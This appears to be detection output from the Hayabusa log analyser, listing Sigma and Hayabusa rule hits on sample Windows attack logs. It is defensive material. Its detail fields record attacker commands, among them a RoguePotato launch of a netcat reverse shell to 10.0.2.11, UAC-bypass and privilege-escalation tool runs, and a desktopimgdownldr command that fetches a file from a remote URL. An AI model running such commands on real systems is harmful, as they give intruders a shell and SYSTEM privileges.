+2020-05-10 09:09:36.635 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: NetworkServiceExploit.exe -i -c ""c:\Windows\System32\cmd.exe"" : Path: C:\Users\IEUser\Tools\PrivEsc\NetworkServiceExploit.exe : User: NT AUTHORITY\NETWORK SERVICE : Parent Command: ""cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/PrivEsc_Imperson_NetSvc_to_Sys_Decoder_Sysmon_1_17_18.evtx +2020-05-10 09:09:36.709 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: c:\Windows\System32\cmd.exe : Path: C:\Windows\System32\cmd.exe : User: NT AUTHORITY\SYSTEM : Parent Command: NetworkServiceExploit.exe -i -c ""c:\Windows\System32\cmd.exe""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/PrivEsc_Imperson_NetSvc_to_Sys_Decoder_Sysmon_1_17_18.evtx +2020-05-10 09:09:43.372 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: whoami : Path: C:\Windows\System32\whoami.exe : User: NT AUTHORITY\SYSTEM : Parent Command: c:\Windows\System32\cmd.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/PrivEsc_Imperson_NetSvc_to_Sys_Decoder_Sysmon_1_17_18.evtx +2020-05-10 09:09:43.372 +09:00,MSEDGEWIN10,1,high,Run Whoami as SYSTEM,,rules/sigma/process_creation/win_whoami_as_system.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/PrivEsc_Imperson_NetSvc_to_Sys_Decoder_Sysmon_1_17_18.evtx +2020-05-10 09:09:43.372 +09:00,MSEDGEWIN10,1,medium,Whoami Execution,,rules/sigma/process_creation/win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/PrivEsc_Imperson_NetSvc_to_Sys_Decoder_Sysmon_1_17_18.evtx +2020-05-10 09:09:43.372 +09:00,MSEDGEWIN10,1,low,Local Accounts Discovery,,rules/sigma/process_creation/win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege 
Escalation/PrivEsc_Imperson_NetSvc_to_Sys_Decoder_Sysmon_1_17_18.evtx +2020-05-10 09:11:16.714 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/PrivEsc_Imperson_NetSvc_to_Sys_Decoder_Sysmon_1_17_18.evtx +2020-05-12 08:21:56.493 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: RoguePotato.exe -r 10.0.2.11 -e ""c:\Users\IEUser\tools\misc\nc64.exe 10.0.2.11 3001 -e cmd.exe"" -l 9999 : Path: C:\Users\IEUser\Tools\PrivEsc\RoguePotato.exe : User: NT AUTHORITY\LOCAL SERVICE : Parent Command: ""cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_roguepotato_sysmon_17_18.evtx +2020-05-12 08:21:56.519 +09:00,MSEDGEWIN10,17,critical,EfsPotato Named Pipe,,rules/sigma/pipe_created/sysmon_efspotato_namedpipe.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_roguepotato_sysmon_17_18.evtx +2020-05-12 08:21:56.562 +09:00,MSEDGEWIN10,18,critical,EfsPotato Named Pipe,,rules/sigma/pipe_created/sysmon_efspotato_namedpipe.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_roguepotato_sysmon_17_18.evtx +2020-05-12 08:21:56.587 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: c:\Users\IEUser\tools\misc\nc64.exe 10.0.2.11 3001 -e cmd.exe : Path: C:\Users\IEUser\Tools\Misc\nc64.exe : User: NT AUTHORITY\SYSTEM : Parent Command: RoguePotato.exe -r 10.0.2.11 -e ""c:\Users\IEUser\tools\misc\nc64.exe 10.0.2.11 3001 -e cmd.exe"" -l 9999",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_roguepotato_sysmon_17_18.evtx +2020-05-12 08:21:56.661 
+09:00,MSEDGEWIN10,1,informational,Process Creation,Command: cmd.exe : Path: C:\Windows\System32\cmd.exe : User: NT AUTHORITY\SYSTEM : Parent Command: c:\Users\IEUser\tools\misc\nc64.exe 10.0.2.11 3001 -e cmd.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_roguepotato_sysmon_17_18.evtx +2020-05-12 08:22:26.650 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\SYSTEM : Parent Command: ?,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_roguepotato_sysmon_17_18.evtx +2020-05-12 08:22:26.650 +09:00,MSEDGEWIN10,1,high,Suspicious Svchost Process,,rules/sigma/process_creation/win_susp_svchost.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_roguepotato_sysmon_17_18.evtx +2020-05-12 08:22:26.650 +09:00,MSEDGEWIN10,1,low,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation/win_proc_wrong_parent.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_roguepotato_sysmon_17_18.evtx +2020-05-13 00:06:49.019 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: Akagi.exe 58 c:\Windows\System32\cmd.exe : Path: C:\Users\IEUser\Tools\PrivEsc\Akagi.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_uacme_58.evtx +2020-05-13 00:06:49.019 +09:00,MSEDGEWIN10,1,high,UAC Bypass Tool UACMe,,rules/sigma/process_creation/win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_uacme_58.evtx +2020-05-13 00:06:49.211 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 328 310 0000028A37652590 : Path: 
C:\Windows\System32\consent.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_uacme_58.evtx +2020-05-13 00:06:49.390 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Users\IEUser\AppData\Local\Temp\DNeruK\system32\Clipup.exe -o -previd pe386 : Path: C:\Users\IEUser\AppData\Local\Temp\DNeruK\system32\Clipup.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Windows\system32\DllHost.exe /Processid:{BD54C901-076B-434E-B6C7-17C531F4AB41},rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_uacme_58.evtx +2020-05-13 00:06:49.390 +09:00,MSEDGEWIN10,1,high,UAC Bypass Tool UACMe,,rules/sigma/process_creation/win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_uacme_58.evtx +2020-05-13 00:06:49.390 +09:00,MSEDGEWIN10,1,high,CMSTP UAC Bypass via COM Object Access,,rules/sigma/process_creation/win_cmstp_com_object_access.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_uacme_58.evtx +2020-05-13 00:06:49.447 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: c:\Windows\System32\cmd.exe : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Users\IEUser\AppData\Local\Temp\DNeruK\system32\Clipup.exe -o -previd pe386,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_uacme_58.evtx +2020-05-13 09:28:16.122 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\cmd.exe : Path: C:\Windows\System32\cmd.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k DcomLaunch -p -s 
PlugPlay,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/revshell_cmd_svchost_sysmon_1.evtx +2020-05-13 09:28:52.873 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/revshell_cmd_svchost_sysmon_1.evtx +2020-05-13 09:28:52.914 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k LocalService -p -s fdPHost : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\LOCAL SERVICE : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/revshell_cmd_svchost_sysmon_1.evtx +2020-05-13 09:28:52.950 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\System32\svchost.exe -k LocalServiceAndNoImpersonation -p -s wcncsvc : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\LOCAL SERVICE : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/revshell_cmd_svchost_sysmon_1.evtx +2020-05-24 10:13:47.756 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: RogueWinRM.exe -p c:\Windows\System32\cmd.exe : Path: C:\Users\IEUser\Tools\PrivEsc\RogueWinRM.exe : User: NT AUTHORITY\LOCAL SERVICE : Parent Command: ""cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/RogueWinRM.evtx +2020-05-24 10:13:48.864 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\SYSTEM : Parent 
Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/RogueWinRM.evtx +2020-05-24 10:13:50.327 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: c:\Windows\System32\cmd.exe : Path: C:\Windows\System32\cmd.exe : User: NT AUTHORITY\SYSTEM : Parent Command: RogueWinRM.exe -p c:\Windows\System32\cmd.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/RogueWinRM.evtx +2020-05-24 10:13:51.206 +09:00,MSEDGEWIN10,3,high,Remote PowerShell Session,,rules/sigma/network_connection/sysmon_remote_powershell_session_network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/RogueWinRM.evtx +2020-05-24 10:13:51.206 +09:00,MSEDGEWIN10,3,high,Remote PowerShell Session,,rules/sigma/network_connection/sysmon_remote_powershell_session_network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/RogueWinRM.evtx +2020-05-24 10:13:54.120 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: whoami : Path: C:\Windows\System32\whoami.exe : User: NT AUTHORITY\SYSTEM : Parent Command: c:\Windows\System32\cmd.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/RogueWinRM.evtx +2020-05-24 10:13:54.120 +09:00,MSEDGEWIN10,1,high,Run Whoami as SYSTEM,,rules/sigma/process_creation/win_whoami_as_system.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/RogueWinRM.evtx +2020-05-24 10:13:54.120 +09:00,MSEDGEWIN10,1,medium,Whoami Execution,,rules/sigma/process_creation/win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/RogueWinRM.evtx +2020-05-24 10:13:54.120 +09:00,MSEDGEWIN10,1,low,Local Accounts Discovery,,rules/sigma/process_creation/win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/RogueWinRM.evtx 
+2020-07-01 05:50:25.546 +09:00,MSEDGEWIN10,10,critical,Direct Syscall of NtOpenProcess,,rules/sigma/process_access/sysmon_direct_syscall_ntopenprocess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon_10_Evasion_Suspicious_NtOpenProcess_CallTrace.evtx +2020-07-01 05:50:25.546 +09:00,MSEDGEWIN10,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon_10_Evasion_Suspicious_NtOpenProcess_CallTrace.evtx +2020-07-03 02:51:37.819 +09:00,MSEDGEWIN10,1,high,Process Creation Sysmon Rule Alert,"Rule: suspicious execution path : Command: spooler.exe payload.bin : Path: C:\Users\Public\tools\cinj\spooler.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/evasion_codeinj_odzhan_spoolsv_sysmon_10_1.evtx +2020-07-03 02:51:37.819 +09:00,MSEDGEWIN10,1,high,Execution from Suspicious Folder,,rules/sigma/process_creation/win_susp_execution_path.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/evasion_codeinj_odzhan_spoolsv_sysmon_10_1.evtx +2020-07-03 02:51:37.872 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: notepad : Path: C:\Windows\System32\notepad.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\System32\spoolsv.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/evasion_codeinj_odzhan_spoolsv_sysmon_10_1.evtx +2020-07-03 02:51:37.872 +09:00,MSEDGEWIN10,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/evasion_codeinj_odzhan_spoolsv_sysmon_10_1.evtx +2020-07-03 03:00:29.615 +09:00,LAPTOP-JU4M3I0E,1,high,Process Creation Sysmon Rule Alert,"Rule: suspicious 
execution path : Command: chost.exe payload.bin : Path: C:\Users\Public\tools\evasion\chost.exe : User: LAPTOP-JU4M3I0E\bouss : Parent Command: ""C:\windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/evasion_codeinj_odzhan_conhost_sysmon_10_1.evtx +2020-07-03 03:00:29.615 +09:00,LAPTOP-JU4M3I0E,1,high,Execution from Suspicious Folder,,rules/sigma/process_creation/win_susp_execution_path.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/evasion_codeinj_odzhan_conhost_sysmon_10_1.evtx +2020-07-03 03:00:29.650 +09:00,LAPTOP-JU4M3I0E,1,informational,Process Creation,Command: notepad : Path: C:\Windows\System32\notepad.exe : User: LAPTOP-JU4M3I0E\bouss : Parent Command: \??\C:\windows\system32\conhost.exe 0xffffffff -ForceV1,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/evasion_codeinj_odzhan_conhost_sysmon_10_1.evtx +2020-07-03 03:00:29.650 +09:00,LAPTOP-JU4M3I0E,1,medium,Conhost Parent Process Executions,,rules/sigma/process_creation/win_susp_conhost.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/evasion_codeinj_odzhan_conhost_sysmon_10_1.evtx +2020-07-03 03:00:29.650 +09:00,LAPTOP-JU4M3I0E,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/evasion_codeinj_odzhan_conhost_sysmon_10_1.evtx +2020-07-03 17:47:20.037 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd /c desktopimgdownldr.exe /lockscreenurl:https://a.uguu.se/Hv0bgvgHGNeH_Bin.7z /eventName:desktopimgdownldr : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_11_1_lolbas_downldr_desktopimgdownldr.evtx 
+2020-07-03 17:47:20.037 +09:00,MSEDGEWIN10,1,high,Suspicious Desktopimgdownldr Command,,rules/sigma/process_creation/win_susp_desktopimgdownldr.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_11_1_lolbas_downldr_desktopimgdownldr.evtx +2020-07-03 17:47:20.073 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: desktopimgdownldr.exe /lockscreenurl:https://a.uguu.se/Hv0bgvgHGNeH_Bin.7z /eventName:desktopimgdownldr : Path: C:\Windows\System32\desktopimgdownldr.exe : User: MSEDGEWIN10\IEUser : Parent Command: cmd /c desktopimgdownldr.exe /lockscreenurl:https://a.uguu.se/Hv0bgvgHGNeH_Bin.7z /eventName:desktopimgdownldr ,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_11_1_lolbas_downldr_desktopimgdownldr.evtx +2020-07-03 17:47:20.073 +09:00,MSEDGEWIN10,1,high,Suspicious Desktopimgdownldr Command,,rules/sigma/process_creation/win_susp_desktopimgdownldr.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_11_1_lolbas_downldr_desktopimgdownldr.evtx +2020-07-03 17:47:21.491 +09:00,MSEDGEWIN10,11,high,Suspicious Desktopimgdownldr Target File,,rules/sigma/file_event/win_susp_desktopimgdownldr_file.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_11_1_lolbas_downldr_desktopimgdownldr.evtx +2020-07-03 17:55:49.123 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Download LockScreen Image : URL: https://a.uguu.se/Hv0bgvgHGNeH_Bin.7z,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/windows_bits_4_59_60_lolbas desktopimgdownldr.evtx +2020-07-03 18:05:58.278 +09:00,win10.ecorp.com,1,informational,Process Creation,"Command: explorer.exe /root,""c:\windows\System32\calc.exe"" : Path: C:\Windows\explorer.exe : User: ECORP\Administrator : Parent Command: ""C:\Windows\system32\cmd.exe"" 
",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/susp_explorer_exec_root_cmdline_@rimpq_@CyberRaiju.evtx +2020-07-03 18:05:58.278 +09:00,win10.ecorp.com,1,medium,Explorer Root Flag Process Tree Break,,rules/sigma/process_creation/win_susp_explorer_break_proctree.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/susp_explorer_exec_root_cmdline_@rimpq_@CyberRaiju.evtx +2020-07-03 18:05:58.278 +09:00,win10.ecorp.com,1,low,Proxy Execution Via Explorer.exe,,rules/sigma/process_creation/win_susp_explorer.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/susp_explorer_exec_root_cmdline_@rimpq_@CyberRaiju.evtx +2020-07-03 18:05:58.367 +09:00,win10.ecorp.com,1,informational,Process Creation,"Command: C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding : Path: C:\Windows\explorer.exe : User: ECORP\Administrator : Parent Command: C:\Windows\system32\svchost.exe -k DcomLaunch -p",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/susp_explorer_exec_root_cmdline_@rimpq_@CyberRaiju.evtx +2020-07-03 18:05:58.583 +09:00,win10.ecorp.com,1,informational,Process Creation,"Command: ""C:\Windows\System32\calc.exe"" : Path: C:\Windows\System32\calc.exe : User: ECORP\Administrator : Parent Command: C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/susp_explorer_exec_root_cmdline_@rimpq_@CyberRaiju.evtx +2020-07-03 18:05:58.739 +09:00,win10.ecorp.com,1,informational,Process Creation,"Command: ""C:\Windows\System32\win32calc.exe"" : Path: C:\Windows\System32\win32calc.exe : User: ECORP\Administrator : Parent Command: ""C:\Windows\System32\calc.exe"" 
",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/susp_explorer_exec_root_cmdline_@rimpq_@CyberRaiju.evtx +2020-07-04 23:18:58.268 +09:00,MSEDGEWIN10,13,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/evasion_persis_hidden_run_keyvalue_sysmon_13.evtx +2020-07-08 06:51:39.204 +09:00,LAPTOP-JU4M3I0E,10,high,LSASS Access from Program in Suspicious Folder,,rules/sigma/process_access/win_susp_proc_access_lsass_susp_source.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_2x10_lsass_with_different_pid_RtlCreateProcessReflection.evtx +2020-07-08 06:51:39.256 +09:00,LAPTOP-JU4M3I0E,10,high,LSASS Access from Program in Suspicious Folder,,rules/sigma/process_access/win_susp_proc_access_lsass_susp_source.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_2x10_lsass_with_different_pid_RtlCreateProcessReflection.evtx +2020-07-08 06:51:39.262 +09:00,LAPTOP-JU4M3I0E,10,high,LSASS Access from Program in Suspicious Folder,,rules/sigma/process_access/win_susp_proc_access_lsass_susp_source.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_2x10_lsass_with_different_pid_RtlCreateProcessReflection.evtx +2020-07-09 06:41:52.449 +09:00,MSEDGEWIN10,12,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon_12_DE_AntiForensics_MRU_DeleteKey.evtx +2020-07-09 06:42:01.653 +09:00,MSEDGEWIN10,12,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon_12_DE_AntiForensics_MRU_DeleteKey.evtx +2020-07-09 06:43:13.791 +09:00,MSEDGEWIN10,12,medium,CurrentVersion 
Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon_12_DE_AntiForensics_MRU_DeleteKey.evtx +2020-07-10 05:41:04.488 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN : Service: ATACORE01$ : IP Address: ::ffff:10.23.23.9 : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx +2020-07-10 05:41:04.490 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN : Service: PKI01$ : IP Address: ::ffff:10.23.23.9 : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx +2020-07-10 05:41:04.496 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN : Service: EXCHANGE01$ : IP Address: ::ffff:10.23.23.9 : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx +2020-07-10 05:41:04.497 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN : Service: WEC01$ : IP Address: ::ffff:10.23.23.9 : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx +2020-07-10 05:41:04.501 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: 
admmig@OFFSEC.LAN : Service: FS02$ : IP Address: ::ffff:10.23.23.9 : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx +2020-07-10 05:41:04.505 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN : Service: WSUS01$ : IP Address: ::ffff:10.23.23.9 : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx +2020-07-10 05:41:04.534 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN : Service: DHCP01$ : IP Address: ::ffff:10.23.23.9 : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx +2020-07-10 05:41:04.576 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN : Service: ATANIDS01$ : IP Address: ::ffff:10.23.23.9 : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx +2020-07-10 05:41:04.861 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN : Service: PRTG-MON$ : IP Address: ::ffff:10.23.23.9 : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx +2020-07-10 
